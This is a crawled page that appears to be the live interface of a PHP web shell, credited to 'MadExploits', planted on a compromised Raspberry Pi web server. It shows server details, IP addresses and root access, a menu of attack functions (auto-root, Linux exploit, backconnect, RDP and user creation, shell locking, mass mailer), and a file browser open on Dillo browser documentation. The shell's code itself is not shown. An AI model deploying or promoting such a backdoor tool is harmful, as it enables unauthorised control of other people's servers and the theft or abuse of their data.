Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dillo /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
2.31
KB
-rw-r--r--
Cache.txt.gz
2.35
KB
-rw-r--r--
Cookies.txt
2.35
KB
-rw-r--r--
Dillo.txt
3.51
KB
-rw-r--r--
Dpid.txt.gz
3.83
KB
-rw-r--r--
Dw.txt
217
B
-rw-r--r--
HtmlParser.txt
3.54
KB
-rw-r--r--
IO.txt.gz
7.49
KB
-rw-r--r--
Images.txt.gz
1.79
KB
-rw-r--r--
Imgbuf.txt.gz
2.64
KB
-rw-r--r--
NC_design.txt.gz
1.91
KB
-rw-r--r--
NEWS.Debian.gz
299
B
-rw-r--r--
NEWS.gz
494
B
-rw-r--r--
README
2
KB
-rw-r--r--
README.Debian
351
B
-rw-r--r--
Selection.txt.gz
2.16
KB
-rw-r--r--
changelog.Debian.gz
6.89
KB
-rw-r--r--
changelog.gz
35.04
KB
-rw-r--r--
copyright
2.38
KB
-rw-r--r--
dillorc.gz
5.14
KB
-rw-r--r--
dw-changes.doc
3.95
KB
-rw-r--r--
dw-example-screenshot.png
3.72
KB
-rw-r--r--
dw-images-and-backgrounds.doc....
2.73
KB
-rw-r--r--
dw-layout-views.doc.gz
3.22
KB
-rw-r--r--
dw-layout-widgets.doc.gz
3.24
KB
-rw-r--r--
dw-map.doc
2.19
KB
-rw-r--r--
dw-overview.doc.gz
1.8
KB
-rw-r--r--
dw-size-of-widget.png
2.76
KB
-rw-r--r--
dw-style-box-model.png
5
KB
-rw-r--r--
dw-style-length-absolute.png
756
B
-rw-r--r--
dw-style-length-percentage.png
1.08
KB
-rw-r--r--
dw-style-length-relative.png
1.06
KB
-rw-r--r--
dw-textblock-collapsing-spaces...
641
B
-rw-r--r--
dw-textblock-collapsing-spaces...
521
B
-rw-r--r--
dw-textblock-collapsing-spaces...
802
B
-rw-r--r--
dw-textblock-collapsing-spaces...
586
B
-rw-r--r--
dw-usage.doc.gz
3.79
KB
-rw-r--r--
dw-viewport-with-scrollbar.png
755
B
-rw-r--r--
dw-viewport-without-scrollbar....
542
B
-rw-r--r--
dw-widget-sizes.doc.gz
2.44
KB
-rw-r--r--
fltk-problems.doc.gz
1.75
KB
-rw-r--r--
index.doc
1.37
KB
-rw-r--r--
lout.doc
3.06
KB
-rw-r--r--
rounding-errors.doc
909
B
-rw-r--r--
uml-legend.doc.gz
1.46
KB
-rw-r--r--
user_help.html
13.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.doc
/** \mainpage <h2>Overview</h2> This is a list of documents to start with: <ul> <li> \ref lout <li> \ref dw-overview (map at \ref dw-map) </ul> Currently, a document \ref fltk-problems is maintained, ideally, it will be removed soon. <h2>Historical</h2> <h3>Replacements for GTK+ and GLib</h3> There are several classes etc., which are used for tasks formerly (in the GTK+ version of dillo) achieved by GtkObject (in 1.2.x, this is part of Gtk+) and GLib. For an overview on all this, take a look at \ref lout. GtkObject is replaced by the following: <ul> <li> lout::object::Object is a common base class for many classes used dillo. In the namespace lout::object, there are also some more common classes and interfaces. <li> A sub class of lout::object::Object is lout::identity::IdentifiableObject, which allows to determine the class at run-time (equivalent to GTK_CHECK_CAST in GtkObject). <li> For signals, there is the namespace lout::signal. </ul> Hash tables, linked lists etc. can be found in the lout::container namespace, several useful macros from GLib have been implemented as inline functions in the lout::misc namespace. As an alternative to the macros defined in list.h, there is also a template class, lout::misc::SimpleVector, which does the same. <h3>Changes in Dw</h3> If you have been familiar with Dw before, take a look at \ref dw-changes. */
Close